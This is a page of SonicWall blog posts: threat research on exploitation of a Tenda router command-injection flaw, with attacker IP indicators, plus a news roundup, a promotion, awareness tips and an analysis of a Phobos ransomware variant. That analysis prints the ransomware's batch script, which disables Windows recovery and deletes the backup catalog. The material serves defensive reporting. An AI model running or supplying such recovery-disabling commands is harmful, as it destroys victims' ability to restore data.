Attackers actively targeting Tenda WiFi router vulnerability

/in /by
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the  arbitrary remote code execution vulnerability reported in Tenda AC15 router. Tenda AC15 AC1900AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking life.

CVE-2020–10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. This vulnerability is due to improper validation of the input parameter deviceName and this value is directly passed to a doSystemCmd function, causing an arbitrary command execution.

Exploit:

In the below exploit request that was captured, the attacker passes the malicious shellcode through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it

When usb.sh is executed, it downloads more payloads from the attacker server 5.252.194.29 and executes them one by one.

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18

 

Cybersecurity News & Trends – 10-02-20

/0 Comments/in /by

This week, attackers targeted everything from the energy sector and the U.S. elections to social media accounts and your coffeemaker.

SonicWall in the News

The 100 People You Don’t Know but Should 2020 — CRN

  • SonicWall’s Jason Carter has been selected to be part of CRN’s annual “100 People You Don’t Know but Should” list.

How Home Tech Can Be Companies’ Weakest Link — Financial Times (Business Education)

  • SonicWall President and CEO Bill Conner weighs in on how companies can protect against risks due to remote employees’ home network setups.

Managed IT Service Providers Expands Support For Remote Workers During Pandemic — Crain’s Detroit Business

  • In March, SonicWall helped Vision Computer Solutions acquire additional licenses more quickly than normal so the company could rapidly transition to remote work.

These 13 Israeli Cybersecurity Startups Have Raised A collective $847 Million In Funding This Year For New Tools That Protect Remote Work  — Business Insider

  • Perimeter 81 — which SonicWall has invested in — is included in the roundup as a cloud-based company helping IT and security professionals more easily secure remote access.

Industry News

U.S. tech giants face curbs on data sharing, digital marketplaces, under draft EU rules — Reuters

  • Google, Facebook, Amazon, Apple and other U.S. tech giants could be banned from favoring their services or forcing users to sign up to a bundle of services under draft EU rules.

House passes bills to secure energy sector against cyberattacks — The Hill

  • The House has unanimously passed four bills aimed at securing the power grid and other energy infrastructure against cyberattacks.

Microsoft looks to expose espionage groups taking aim at NGOs, US politics — Cyberscoop

  • Cyberscoop summarizes/explores the new Microsoft report — a detailed review of criminal and government hackers’ tradecraft.

When coffee makers are demanding a ransom, you know IoT is screwed — Ars Technica

  • With the name Smarter, you might expect a network-connected kitchen appliance maker to be, well, smarter than companies selling conventional appliances. But in the case of the Smarter’s IoT coffee maker, you’d be wrong.

CISA Warns of Hackers Exploiting Zerologon Vulnerability — Security Week

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert to warn of attackers actively targeting a recently addressed vulnerability in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC).

Microsoft disrupts nation-state hacker op using Azure Cloud service — Bleeping Computer

  • In a report today, Microsoft said that it disrupted operations of a nation-state threat group that was using its Azure cloud infrastructure for cyberattacks.

Ransomware Attacks Take On New Urgency Ahead of Vote — The New York Times

  • Attacks against small towns, big cities and the contractors who run their voting systems have federal officials fearing that hackers will try to sow chaos around the election.

FBI director warns that Chinese hackers are still targeting US COVID-19 research — The Hill

  • FBI Director Christopher Wray said Chinese hackers are continuing to target U.S. companies involved in COVID-19 research and described China as the nation’s “greatest counterintelligence threat.”

Mount Locker ransomware joins the multi-million dollar ransom game — Bleeping Computer

  • A new ransomware operation named Mount Locker is stealing victims’ files before encrypting and then demanding multi-million dollar ransoms.

FBI Director: Feeding DOD’s Cyber Offense Operations Is Crucial to New Strategy — Nextgov

  • Senator says legislation is moving forward to thwart intellectual property theft and defend federal networks from cyberattacks.

Phishing attacks are targeting your social network accounts — Bleeping Computer

  • Scammers are targeting your social network accounts with phishing emails that pretend to be copyright violations or promises of a shiny ‘blue checkmark’ next to your name.

In Case You Missed It

Operator of new Phobos variant gives blunt response during negotiation

/in /by

The SonicWall Capture Labs threat research team have observed a new variant from the Phobos ransomware family.  Like Sodinokibi, Phobos is sold on the criminal underground using the ransomware-as-a-service (RaaS) model.  It is spread using various infection methods such as vulnerable Remote Desktop connections and spam email attachments. In the past we have seen Phobos primarily targeting businesses.  However, recently we have also seen several reports of individuals being hit with this malware.  During our analysis of this malware we negotiate ransom payment with the operator.

 

Infection cycle:

 

Upon infection, the following files are dropped onto the system:

  • %APPDATA%\roaming\microsoft\windows\start menu\programs\startup\db_exec.exe [Detected as: GAV: Phobos.RSM_12 (Trojan)]
  • {malware run location}\TempWmicBatchFile.bat
  • {desktop}\info.hta
  • {desktop}\info.txt

 

Files on the system are encrypted and given the following extension:

  • id[94458690-2589].[helpisos@aol.com].isos

 

TempWmicBatchFile.bat contains the following script which, when executed, disables system recovery features:

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit

 

info.hta contains the ransom message and is displayed multiple times on the desktop:

 

info.txt also contains the ransom message:

 

Negotiation:

 

We attempted to reach out to helpisos@aol.com as instructed in the ransom note but were notified by the email server that the address “couldn’t be found, or is unable to receive mail“.  We proceeded to contact @iso_recovery on Telegram and had the following conversation with the operator:

 

Nowadays, ransom fees for individuals are negotiable.  We tried our luck to see how much of a discount is available:

 

We attempted to push further and enlighten the operator about our “dire financial situation” but received the following blunt response:

 

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Phobos.RSM_12 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

‘3 & Free’ Promotion: How to Upgrade Your SonicWall Firewall for Free

/0 Comments/in /by

You can’t rely on yesterday’s solutions to thwart tomorrow’s attacks.

And as these attacks become more sophisticated, varied and numerous than ever, it’s never been more crucial to defend your organization’s networks, data and applications.

Often, this means ensuring your organization is protected by the latest and most cost-effective firewall appliances and real-time security services. That’s why the SonicWall ‘3 & Free’ program makes it easy for customers to upgrade from their legacy firewall to the latest SonicWall NSa 2650TZ350 or SOHO 250 firewalls.

When you upgrade your SonicWall firewall you gain the latest in next-generation firewall (NGFW) technology and access to the SonicWall Capture Advanced Threat Protection (ATP) service. It’s a cloud-based, multi-engine sandbox that stops both known and unknown cyberattacks from critically impacting your business.

What is the SonicWall ‘3 & Free’ Promotion?

The limited-time SonicWall ‘3 & Free’ promotion is the easy, cost-effective way for customers to upgrade to the very latest SonicWall next-generation firewall appliance for free.

Through Oct. 31, 2020, eligible customers may receive a complimentary NSa 2650, TZ350 or SOHO 250 appliance by purchasing a bundle that includes a three-year subscription of the SonicWall Advanced Gateway Security Suite from their authorized SonicWall SecureFirst partner.

This security suite includes everything you need to stay protected against today’s modern attacks, including advanced malware, ransomwareencrypted threats, viruses, spyware, zero-day exploits and more. This complete service includes:

SonicWall’s exclusive security subscription service also includes SonicWall Real-Time Deep Memory Inspection (RTDMI). A patent-pending technology, RTDMI™ enables Capture ATP to detect and block malware that does not exhibit any malicious behavior or hides weaponry via encryption. This protects your organization from zero-day attacks, malicious PDFs and Microsoft Office files.

Upgrade Your SonicWall Firewall for Free

Ready to upgrade? Take advantage of our ‘3 & Free’ program to get the latest in SonicWall next-generation firewall technology — for free. To upgrade, talk to a SonicWall cybersecurity expert today or contact your dedicated SecureFirst Partner.

UPGRADE NOW

National Cybersecurity Awareness Month Empowers Individuals, Orgs to Own Their Role in Cybersecurity

/0 Comments/in , /by

What’s scarier than Dracula, trickier than a haunted house and more expensive than a giant bucket of Halloween candy? Cyberattacks — and they can devastate individuals and organizations alike. Fortunately, however, they can be prevented if we all contribute. Today marks the beginning of the 17th annual National Cybersecurity Awareness Month, and this year SonicWall will bring you tips, best practices and more to ensure you’re ready to “Do Your Part. #BeCyberSmart.”

Each October, the National Cyber Security Alliance collaborates with the Cybersecurity and Infrastructure Security Agency (CISA) to launch a month-long campaign highlighting new and emerging threats and helping ensure all Americans have the resources they need to be safer and more secure online.

“While technology — a luxury turned necessity — continues to improve the quality of lives and economies around the world, some individuals will naturally try to navigate around it or simply bypass it altogether, placing themselves and their organization at risk,” said SonicWall President and CEO Bill Conner. “Now that mobile and remote workforces rely upon extended distributed networks that include everything from corporate offices to homes, global cybersecurity awareness initiatives are key to educating the masses on the importance of doing their part to protect everything from personal devices, home networks, critical data and infrastructure.”

The theme for 2020, “Do Your Part. #BeCyberSmart,” encourages individuals and organizations to own their role in protecting their part of cyberspace. Being more secure online is a shared responsibility, but by taking proactive steps toward lasting, positive cybersecurity behaviors at work and at home, each of us can help create a safer cyber environment.

As National Cybersecurity Awareness Month Champions, SonicWall’s cybersecurity experts will spend the next month exploring ways to help organizations and individuals protect their information and secure their systems and devices. We’ll explore several topics in depth, but in the meantime, here are some steps each of us can take today:

  • LOCK DOWN YOUR LOGIN
    Use long, unique passphrases that are hard to break but easy to remember for each account, and utilize two-factor or multifactor authentication wherever possible.
  • WHEN IN DOUBT, THROW IT OUT
    Email, social media posts, texts and more aren’t always what they seem — sometimes they harbor malware or malicious links. If you’re unsure about it, hit “delete.”
  • KEEP A CLEAN MACHINE
    Keep all software current to reduce risk of infection from ransomware and malware.
  • BACK IT UP
    Create backups of valuable data. In the case of ransomware or other threats, they can help prevent permanent loss.
  • OWN YOUR ONLINE PRESENCE
    Set up privacy and security settings immediately and check them regularly to ensure they’re still configured to your comfort.
  • SHARE WITH CARE
    Think about the potential consequences before posting personal info about yourself or others.
  • GET SAVVY ABOUT WI-FI HOTSPOTS
    These are not secure, meaning anyone could see what you’re doing while you’re connected to them. Consider a VPN or mobile hotspot for greater security.

“In the physical world, we all know a chain is only as strong as its weakest link,” said Chad Sweet, founder and CEO, The Chertoff Group. “The same is true in cyber. None of us want to be that weak link — failing to protect ourselves, our families or our businesses. As key players like NCSA, DHS and SonicWall have rightly challenged us to do, we need to use National Cybersecurity Awareness Month as a call to action for all of us to recommit to strengthening the ‘links’ where we play a critical role at home, in the office and in our communities.”

About NCSAM

National Cybersecurity Awareness Month was launched by the National Cyber Security Alliance (NCSA) and the U.S. Department of Homeland Security (DHS) in October 2004 as a broad effort to help all Americans stay safer and more secure online. Following wide success of the ‘Our Shared Responsibility’ theme in years past, CISA and NCSA have shifted strategic focus to a message that promotes personal accountability.

To learn more about NCSAM, please visit StaySafeOnline.org.